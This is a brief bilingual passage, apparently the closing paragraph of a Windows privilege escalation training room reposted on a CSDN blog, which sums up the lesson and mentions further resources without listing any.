In this room, we have introduced several privilege escalation techniques available in Windows systems. These techniques should provide you with a solid background on the most common paths attackers can take to elevate privileges on a system. Should you be interested in learning about additional techniques, the following resources are available:在这个房间中,我们介绍了 Windows 系统中可用的几种权限升级技术。这些技术应该为您提供有关攻击者提升系统权限的最常见路径的坚实背景。如果您有兴趣了解其他技术,可以使用以下资源:

From: https://blog.csdn.net/Nobody19/article/details/143943262


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